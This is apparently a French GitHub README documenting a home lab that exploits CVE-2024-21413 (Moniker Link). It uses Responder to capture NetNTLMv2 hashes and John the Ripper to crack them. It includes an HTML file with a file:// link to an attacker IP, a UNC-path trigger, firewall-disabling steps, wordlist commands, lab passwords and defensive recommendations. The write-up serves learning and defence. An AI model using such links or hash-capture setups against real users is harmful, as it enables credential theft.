Configuration du laboratoire Moniker Link - CVE-2024-21413
🎯 Vue d'ensemble du projet
Laboratoire pratique de tests d'intrusion démontrant l'exploitation de la vulnérabilité Moniker Link (CVE-2024-21413) pour le vol d'identifiants NTLM. Ce projet documente la chaîne d'attaque complète, de la configuration à la compromission des identifiants, en passant par les défis rencontrés en conditions réelles et leurs solutions.
Réussite clé : Exécution réussie de l'attaque Moniker Link à la fois dans un environnement de laboratoire isolé (VM Windows 10) et sur un système réel (PC Windows 11), démontrant des vulnérabilités de sécurité pratiques et les contre-mesures défensives.
🏗️ Architecture du laboratoire
Infrastructure
Machine d'attaque :
- Plateforme : Kali Linux 2024
- Réseau (Host-Only) : 192.168.56.101
- Réseau (ponté) : 192.168.1.117
- Outil principal : Responder 3.1.6.0
Systèmes cibles :
- VM Windows 10 : 192.168.56.104 (environnement de test isolé)
- PC Windows 11 : 192.168.1.178 (validation en conditions réelles)
Configuration réseau :
- Adaptateur Host-Only VirtualBox (test en VM)
- Adaptateur ponté VirtualBox (test sur PC réel)
- Isolé des réseaux de production
⚔️ Exécution de l'attaque
Déroulement de l'attaque
- Déployer Responder sur Kali pour écouter l'authentification NTLM
- Créer un lien malveillant avec le protocole file:// pointant vers l'IP de l'attaquant
- Déclencher l'authentification via un chemin UNC dans l'Explorateur de fichiers
- Capturer le hash NetNTLMv2 lorsque la victime tente de se connecter
- Casser le mot de passe avec John the Ripper
Vecteur d'attaque simple
Fichier HTML (test.html) :
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>
Méthode via l'Explorateur de fichiers :
- L'utilisateur saisit :
\\192.168.56.101\test dans la barre d'adresse
- Windows tente une connexion SMB
- Le hash NTLM est envoyé automatiquement (ou invite de saisie des identifiants)
- Responder capture l'authentification
🚧 Défis et solutions
Défi 1 : Blocage du pare-feu Windows (PC Windows 11)
Problème :
- Impossible de joindre le PC Windows 11 depuis Kali
- Les tentatives de connexion SMB ont échoué
- Attaque complètement bloquée
Cause racine :
- Le pare-feu Windows est activé par défaut
- Il bloque les connexions SMB entrantes provenant d'IP externes
Solution :
- Désactivation temporaire du pare-feu Windows pour le test
- Connexion réussie immédiatement
- Hash capturé avec succès
Leçon : Le pare-feu Windows par défaut offre une protection efficace contre cette attaque. Les utilisateurs doivent le laisser activé.
Défi 2 : Résultats en cache de John the Ripper (VM Windows 10)
Problème :
- Mot de passe initial de Windows 10 :
nwigwecj1
- John a affiché :
12Honey (mauvais mot de passe !)
12Honey provenait d'un test précédent
Cause racine :
- John enregistre les mots de passe cassés dans
~/.john/john.pot
- Ancien hash d'une session précédente
- Affiche le résultat en cache au lieu du mot de passe actuel
Solution :
- Changement du mot de passe de la VM Windows 10 en
1414
- Capture d'un nouveau hash
- Création d'une liste de mots personnalisée avec des mots de passe probables
- Cassé avec succès avec la nouvelle liste de mots
Leçon : Vérifiez toujours que vous cassez le bon hash. Effacez le fichier pot ou utilisez des mots de passe uniques pour les tests.
Défi 3 : Mot de passe absent de Rockyou.txt
Problème :
- Mot de passe
1414 introuvable dans rockyou.txt (14 millions de mots de passe)
- L'attaque par liste de mots générique a échoué
Cause racine :
- Rockyou.txt ne contient pas toutes les combinaisons possibles à 4 chiffres
- Les séquences numériques simples manquent souvent dans les listes de mots courantes
Solution :
- Création d'une liste de mots personnalisée ciblée basée sur des modèles courants :
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
- Cassé instantanément avec la liste de mots personnalisée
Leçon : « Absent de rockyou.txt » ≠ sécurisé. Les mots de passe courts sont vulnérables aux attaques ciblées et à la force brute, quelle que soit la liste de mots.
📊 Résultats
VM Windows 10 (environnement contrôlé)
PC Windows 11 (système réel)
🛡️ Analyse de sécurité
Ce qui a fonctionné (Défense)
✅ Pare-feu Windows - A complètement bloqué l'attaque lorsqu'il est activé
✅ Navigateurs modernes - Chrome/Edge bloquent les liens file:// distants
✅ Sensibilisation des utilisateurs - L'invite manuelle exige une action de l'utilisateur
Ce qui a échoué (Vulnérabilités)
❌ Mots de passe faibles - Un mot de passe numérique à 4 caractères se casse facilement
❌ Pare-feu désactivé - Erreur courante des utilisateurs
❌ Explorateur de fichiers - Aucun avertissement pour les chemins UNC
❌ Protocole NTLM - Authentification automatique aux partages SMB
Constatations clés
1. Le pare-feu est essentiel
- Le pare-feu Windows par défaut bloque cette attaque
- Environ 30 à 40 % des utilisateurs le désactivent définitivement
- Les réseaux d'entreprise autorisent souvent le SMB interne
2. L'illusion de la force des mots de passe
1414 absent de rockyou.txt (semble « robuste »)
- Cassé instantanément avec une liste de mots ciblée
- Les mots de passe courts n'offrent aucune sécurité
3. Interaction de l'utilisateur requise
- La sécurité moderne exige que l'utilisateur colle un chemin UNC
- L'ingénierie sociale reste un élément essentiel
- L'exploit technique seul est insuffisant
🔧 Outils utilisés
Offensifs :
- Responder 3.1.6.0 (capture de hash NTLM)
- John the Ripper (cassage de mots de passe)
- Création de listes de mots personnalisées
- Fichier HTML simple
Infrastructure :
- VirtualBox 7.0 (virtualisation)
- Kali Linux 2024 (plateforme d'attaque)
- Windows 10 Entreprise (cible de test)
- Windows 11 Pro (validation en conditions réelles)
📁 Structure du dépôt
Moniker-Link-Lab-Setup/
├── README.md (this file)
├── Documentation/
│ ├── attack-execution.md (step-by-step attack guide)
│ └── README.md (documentation overview)
├── Screenshots/ (attack screenshots - to be added)
└── Scripts/ (HTML test file - to be added)
🎓 Compétences démontrées
Techniques :
- Analyse des protocoles réseau (SMB, NTLM)
- Méthodologie de test d'intrusion
- Techniques de cassage de mots de passe
- Infrastructure de laboratoire virtuel
- Dépannage de pare-feu
Professionnelles :
- Documentation technique
- Résolution de problèmes sous contraintes
- Évaluation de la sécurité
- Analyse des risques
- Pratiques de test éthiques
🔒 Recommandations défensives
Pour les utilisateurs
- ✅ Gardez le pare-feu Windows activé
- ✅ Ne collez jamais de chemins UNC provenant d'e-mails
- ✅ Utilisez des mots de passe forts (15 caractères ou plus)
- ✅ Vérifiez l'expéditeur avant d'accéder aux partages de fichiers
Pour les organisations
- ✅ Bloquez le SMB sortant (port 445) au niveau du pare-feu réseau
- ✅ Désactivez NTLM, imposez Kerberos
- ✅ Surveillez les connexions SMB vers des IP externes
- ✅ Filtrage de la passerelle e-mail (suppression des liens file://)
- ✅ Formation à la sensibilisation à la sécurité
- ✅ Politiques de complexité des mots de passe
⚠️ Divulgation éthique
Tous les tests ont été effectués sur des systèmes autorisés :
- Infrastructure de laboratoire personnelle uniquement
- Réseaux virtuels isolés
- Appareils et comptes personnels
- À des fins éducatives
Avis juridique : L'accès non autorisé à un système informatique est illégal. Ce projet est uniquement destiné à des fins éducatives et à des environnements de test autorisés.
📚 Références
LinkedIn : https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/
GitHub : @E-m-e-k-a
Date : mars 2026
📄 Licence
Usage éducatif uniquement. Pas pour les tests non autorisés.
⭐ Si ce projet vous a été utile, pensez à mettre une étoile sur le dépôt !